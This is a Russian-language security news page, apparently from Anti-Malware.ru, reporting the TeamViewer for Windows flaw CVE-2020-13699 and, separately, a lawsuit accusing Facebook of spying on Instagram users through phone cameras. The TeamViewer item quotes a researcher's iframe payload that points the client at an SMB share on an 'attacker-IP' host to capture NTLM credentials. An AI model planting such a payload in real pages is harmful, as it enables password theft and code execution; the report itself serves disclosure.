Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

На Facebook снова подали в суд из-за слежки за пользователями Instagram

На Facebook в очередной раз подали в суд. Причина уже известная — социальную сеть обвиняют в слежке за пользователями Instagram через камеры смартфонов.

Бриттани Кондити, проживающая в Нью-Джерси, подала иск, в котором утверждается, что владельцы Instagram намеренно используют камеру мобильного устройства для сбора «ценной информации о пользователях».

«Facebook и Instagram собирают личную информацию своих пользователей, включая конфиденциальные данные о местах проживания людей. Всё это делается с одной целью — снабдить исследование рынка как можно более ценными сведениями», — пишет истец.

На данный момент представители Facebook от комментариев воздерживаются.

В последнее время социальная площадка Цукерберга часто подвергается нападкам со стороны недовольных и подозрительных пользователей. Например, в прошлом месяце на Facebook подали в суд за якобы нелегальный сбор биометрических данных более 100 миллионов пользователей Instagram.

Тогда в Facebook заявили, что приложение не использует систему распознавания лиц.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru